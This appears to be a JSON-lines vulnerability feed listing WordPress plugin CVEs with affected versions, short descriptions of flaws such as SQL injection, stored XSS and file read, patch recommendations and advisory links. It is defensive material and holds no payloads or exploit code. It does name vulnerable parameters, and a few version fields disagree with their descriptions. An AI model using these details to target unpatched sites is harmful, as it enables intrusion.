{"CVE_ID":"CVE-2024-13344","slug":"scw-seat-reservation","versionImpact":"3.3","versionEndExcluding":"3.4","description":"The Advance Seat Reservation Management for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'profileId' parameter in all versions up to, and including, 3.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/advance-seat-reservation-management-for-woocommerce\\\/19984266\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/advance-seat-reservation-management-for-woocommerce\\\/19984266\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35acdb85-e463-46b1-aea7-a6d4c3581499?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35acdb85-e463-46b1-aea7-a6d4c3581499?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6393","slug":"nextgen-gallery","versionImpact":"3.39.4","versionEndExcluding":"3.39.5","description":"The Photo Gallery, Sliders, Proofing and   WordPress plugin before 3.59.5 does not sanitise and escape some of its Images settings, which could allow high privilege users such as Admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.39.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/126d1dd7-d332-47c8-ad25-5fbe211313b0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/126d1dd7-d332-47c8-ad25-5fbe211313b0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-48328","slug":"nextgen-gallery","versionEndExcluding":"3.39","description":"Cross-Site Request Forgery (CSRF) vulnerability in Imagely WordPress Gallery Plugin \u2013 NextGEN Gallery allows Cross Site Request Forgery.This issue affects WordPress Gallery Plugin \u2013 NextGEN Gallery: from n\/a through 3.37.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/nextgen-gallery\\\/wordpress-wordpress-gallery-plugin-nextgen-gallery-plugin-3-37-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/nextgen-gallery\\\/wordpress-wordpress-gallery-plugin-nextgen-gallery-plugin-3-37-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3279","slug":"nextgen-gallery","versionImpact":"3.38","versionEndExcluding":"3.39","description":"The WordPress Gallery Plugin WordPress plugin before 3.39 does not validate some block attributes before using them to generate paths passed to include function\/s, allowing Admin users to perform LFI attacks","recommendation":"Update to version 3.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b7a7070-8d61-4ff8-b003-b4ff06221635\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b7a7070-8d61-4ff8-b003-b4ff06221635\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3155","slug":"nextgen-gallery","versionImpact":"3.37","versionEndExcluding":"3.39","description":"The WordPress Gallery Plugin WordPress plugin before 3.39 is vulnerable to Arbitrary File Read and Delete due to a lack of input parameter validation in the `gallery_edit` function, allowing an attacker to access arbitrary resources on the server.","recommendation":"Update to version 3.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5c8473f4-4b52-430b-9140-b81b0a0901da\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5c8473f4-4b52-430b-9140-b81b0a0901da\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3154","slug":"nextgen-gallery","versionImpact":"3.38","versionEndExcluding":"3.39","description":"The WordPress Gallery Plugin WordPress plugin before 3.39 is vulnerable to PHAR Deserialization due to a lack of input parameter validation in the `gallery_edit` function, allowing an attacker to access arbitrary resources on the server.","recommendation":"Update to version 3.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ed099489-1db4-4b42-9f72-77de39c9e01e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ed099489-1db4-4b42-9f72-77de39c9e01e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0627","slug":"simple-tags","versionImpact":"3.32.0","versionEndExcluding":"3.33.0","description":"The WordPress Tag, Category, and Taxonomy Manager  WordPress plugin before 3.30.0 does not sanitise and escape some of its Widgets settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.33.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30fbe3c5-f190-48e8-a6bb-e8d78e001e7f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/30fbe3c5-f190-48e8-a6bb-e8d78e001e7f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2793","slug":"atarim-visual-collaboration","versionImpact":"3.30","versionEndExcluding":"3.31","description":"The Visual Website Collaboration, Feedback & Project Management \u2013 Atarim plugin for WordPress is vulnerable to Stored Cross-Site Scripting via comments in all versions up to, and including, 3.30 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bd63003-d1d6-480a-8df7-878bcc89f1ee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bd63003-d1d6-480a-8df7-878bcc89f1ee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_ajax_functions.php#L505\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_ajax_functions.php#L505\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_ajax_functions.php#L666\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_ajax_functions.php#L666\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_ajax_functions.php#L1923\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/trunk\\\/inc\\\/wpf_ajax_functions.php#L1923\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094999\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094999\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094260\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094260\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4566","slug":"elementor","versionImpact":"3.30.2","versionEndExcluding":"3.30.3","description":"The Elementor Website Builder \u2013 More Than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-text DOM element attribute in Text Path widget in all versions up to, and including, 3.30.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This attack affects only Chrome\/Edge browsers","recommendation":"Update to version 3.30.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.28.4\\\/assets\\\/js\\\/text-path.acb8842ac7e1cd1dfb44.bundle.js#L147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.28.4\\\/assets\\\/js\\\/text-path.acb8842ac7e1cd1dfb44.bundle.js#L147\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.28.4\\\/assets\\\/js\\\/text-path.acb8842ac7e1cd1dfb44.bundle.js#L190\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.28.4\\\/assets\\\/js\\\/text-path.acb8842ac7e1cd1dfb44.bundle.js#L190\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3332337%40elementor&new=3332337%40elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3332337%40elementor&new=3332337%40elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af29ec92-5b07-4f57-a25f-19f3a894a193?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af29ec92-5b07-4f57-a25f-19f3a894a193?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8081","slug":"elementor","versionImpact":"3.30.2","versionEndExcluding":"3.30.3","description":"The Elementor plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 3.30.2 via the Import_Images::import() function due to insufficient controls on the filename specified. This makes it possible for authenticated attackers, with administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 3.30.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/elementor\\\/elementor\\\/commit\\\/6af3551ee4213fb4003338743e22f41aa2a09c01\",\"name\":\"https:\\\/\\\/github.com\\\/elementor\\\/elementor\\\/commit\\\/6af3551ee4213fb4003338743e22f41aa2a09c01\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.30.2\\\/includes\\\/template-library\\\/classes\\\/class-import-images.php#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementor\\\/tags\\\/3.30.2\\\/includes\\\/template-library\\\/classes\\\/class-import-images.php#L111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3332233\\\/elementor\\\/trunk\\\/includes\\\/template-library\\\/classes\\\/class-import-images.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3332233\\\/elementor\\\/trunk\\\/includes\\\/template-library\\\/classes\\\/class-import-images.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13929b51-b32e-401c-a642-49f7cd2d07bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13929b51-b32e-401c-a642-49f7cd2d07bf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11895","slug":"paypal-payment-button-by-vcita","versionImpact":"3.20.0","versionEndExcluding":"3.30.0","description":"The Online Payments \u2013 Get Paid with PayPal, Square & Stripe plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 3.20.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.30.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-payment-button-by-vcita\\\/tags\\\/3.10.0\\\/core\\\/shortcodes.php#L129\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-payment-button-by-vcita\\\/tags\\\/3.10.0\\\/core\\\/shortcodes.php#L129\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-payment-button-by-vcita\\\/tags\\\/3.10.0\\\/core\\\/shortcodes.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-payment-button-by-vcita\\\/tags\\\/3.10.0\\\/core\\\/shortcodes.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-payment-button-by-vcita\\\/tags\\\/3.10.0\\\/core\\\/shortcodes.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-payment-button-by-vcita\\\/tags\\\/3.10.0\\\/core\\\/shortcodes.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-payment-button-by-vcita\\\/tags\\\/3.10.0\\\/core\\\/shortcodes.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paypal-payment-button-by-vcita\\\/tags\\\/3.10.0\\\/core\\\/shortcodes.php#L91\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3241650%40paypal-payment-button-by-vcita&new=3241650%40paypal-payment-button-by-vcita&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3241650%40paypal-payment-button-by-vcita&new=3241650%40paypal-payment-button-by-vcita&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aab33299-f02d-44a1-9522-5309eed6fd38?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aab33299-f02d-44a1-9522-5309eed6fd38?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2038","slug":"atarim-visual-collaboration","versionImpact":"3.22.6","versionEndExcluding":"3.30","description":"The Visual Website Collaboration, Feedback & Project Management \u2013 Atarim plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 3.22.6. This is due to the use of hardcoded credentials to authenticate all the incoming API requests. This makes it possible for unauthenticated attackers to modify plugin settings, delete posts, modify post titles, and upload images.","recommendation":"Update to version 3.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29532f4d-e830-4c99-ad77-076eebbbe98d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29532f4d-e830-4c99-ad77-076eebbbe98d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/tags\\\/3.18\\\/inc\\\/wpf_api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/atarim-visual-collaboration\\\/tags\\\/3.18\\\/inc\\\/wpf_api.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old=3076514&old_path=atarim-visual-collaboration%2Ftrunk%2Fatarim-visual-collaboration.php&new=3090249&new_path=atarim-visual-collaboration%2Ftrunk%2Fatarim-visual-collaboration.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old=3076514&old_path=atarim-visual-collaboration%2Ftrunk%2Fatarim-visual-collaboration.php&new=3090249&new_path=atarim-visual-collaboration%2Ftrunk%2Fatarim-visual-collaboration.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6536","slug":"zephyr-project-manager","versionImpact":"3.3.97","versionEndExcluding":"3.3.99","description":"The Zephyr Project Manager WordPress plugin before 3.3.99 does not sanitise and escape some of its settings, which could allow high privilege users such as editors and admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.3.99, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ee40c1c6-4186-4b97-866c-fb0e76cedeb8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ee40c1c6-4186-4b97-866c-fb0e76cedeb8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10554","slug":"wp-advanced-search","versionImpact":"3.3.9.2","versionEndExcluding":"3.3.9.3","description":"The WordPress WP-Advanced-Search WordPress plugin before 3.3.9.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.3.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7c15b082-caa5-4cf2-9986-2eb519dcb7c5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7c15b082-caa5-4cf2-9986-2eb519dcb7c5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9796","slug":"wp-advanced-search","versionImpact":"3.3.9","versionEndExcluding":"3.3.9.2","description":"The WP-Advanced-Search WordPress plugin before 3.3.9.2 does not sanitize and escape the t parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks","recommendation":"Update to version 3.3.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ddd6839-6bcb-4bb8-97e0-1516b8c2b99b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ddd6839-6bcb-4bb8-97e0-1516b8c2b99b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-37867","slug":"yet-another-stars-rating","versionEndExcluding":"3.3.9","description":"Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in YetAnotherStarsRating.Com YASR \u2013 Yet Another Star Rating Plugin for WordPress.This issue affects YASR \u2013 Yet Another Star Rating Plugin for WordPress: from n\/a through 3.3.8.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/yet-another-stars-rating\\\/wordpress-yasr-yet-another-stars-rating-plugin-3-3-8-race-condition-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/yet-another-stars-rating\\\/wordpress-yasr-yet-another-stars-rating-plugin-3-3-8-race-condition-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3942","slug":"masterstudy-lms-learning-management-system","versionImpact":"3.3.8","versionEndExcluding":"3.3.9","description":"The MasterStudy LMS WordPress Plugin \u2013 for Online Courses and Education plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on several functions in versions up to, and including, 3.3.8. This makes it possible for authenticated attackers, with subscriber level permissions and above, to read and modify content such as course questions, post titles, and taxonomies.","recommendation":"Update to version 3.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64eb3d67-7056-4a03-ba3b-a04c2e96648d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64eb3d67-7056-4a03-ba3b-a04c2e96648d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078394\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078394\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4673","slug":"rate-my-post","versionEndExcluding":"3.3.9","description":"The Rate my Post WordPress plugin before 3.3.9 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c4f379d-252a-487b-81c9-bf711ab71dff\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c4f379d-252a-487b-81c9-bf711ab71dff\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0429","slug":"watu","versionEndExcluding":"3.3.8.2","description":"The Watu Quiz WordPress plugin before 3.3.8.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/67d84549-d368-4504-9fa9-b1fce63cb967\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/67d84549-d368-4504-9fa9-b1fce63cb967\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0428","slug":"watu","versionEndExcluding":"3.3.8.2","description":"The Watu Quiz WordPress plugin before 3.3.8.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c933460b-f77d-4986-9f5a-32d9f3f8b412\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c933460b-f77d-4986-9f5a-32d9f3f8b412\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13488","slug":"ltl-freight-quotes-estes-edition","versionImpact":"3.3.7","versionEndExcluding":"3.3.8","description":"The LTL Freight Quotes \u2013 Estes Edition plugin for WordPress is vulnerable to SQL Injection via the 'dropship_edit_id' and 'edit_id' parameters in all versions up to, and including, 3.3.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-estes-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wild-delivery-save.php#L250\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-estes-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wild-delivery-save.php#L250\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-estes-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wild-delivery-save.php#L364\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-estes-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wild-delivery-save.php#L364\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3239967%40ltl-freight-quotes-estes-edition&new=3239967%40ltl-freight-quotes-estes-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3239967%40ltl-freight-quotes-estes-edition&new=3239967%40ltl-freight-quotes-estes-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b77b064d-ab8c-4e84-b5cc-efbdeefbf502?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b77b064d-ab8c-4e84-b5cc-efbdeefbf502?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13485","slug":"ltl-freight-quotes-abf-freight-edition","versionImpact":"3.3.7","versionEndExcluding":"3.3.8","description":"The LTL Freight Quotes \u2013 ABF Freight Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 3.3.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242640%40ltl-freight-quotes-abf-freight-edition&new=3242640%40ltl-freight-quotes-abf-freight-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242640%40ltl-freight-quotes-abf-freight-edition&new=3242640%40ltl-freight-quotes-abf-freight-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fbb4f9a-4c68-4ddb-8e49-9629114b11ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fbb4f9a-4c68-4ddb-8e49-9629114b11ec?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4624","slug":"gs-logo-slider","versionEndExcluding":"3.3.8","description":"The GS Logo Slider WordPress plugin before 3.3.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e7dc0202-6be4-46fc-a451-fb3a25727b51\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e7dc0202-6be4-46fc-a451-fb3a25727b51\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2080","slug":"wp-poll","versionImpact":"3.3.76","versionEndExcluding":"3.3.77","description":"The LiquidPoll \u2013 Polls, Surveys, NPS and Feedback Reviews plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.3.76 via the poller_list shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to extract information from polls that may be private.","recommendation":"Update to version 3.3.77, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84f57623-b6a6-4717-857d-93fa9d279882?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84f57623-b6a6-4717-857d-93fa9d279882?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3054831%40wp-poll&new=3054831%40wp-poll&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3054831%40wp-poll&new=3054831%40wp-poll&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5528","slug":"sassy-social-share","versionImpact":"3.3.75","versionEndExcluding":"3.3.76","description":"The Social Sharing Plugin \u2013 Sassy Social Share plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the heateor_mastodon_share parameter in all versions up to, and including, 3.3.75 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action, such as clicking on a link.","recommendation":"Update to version 3.3.76, or a newer patched 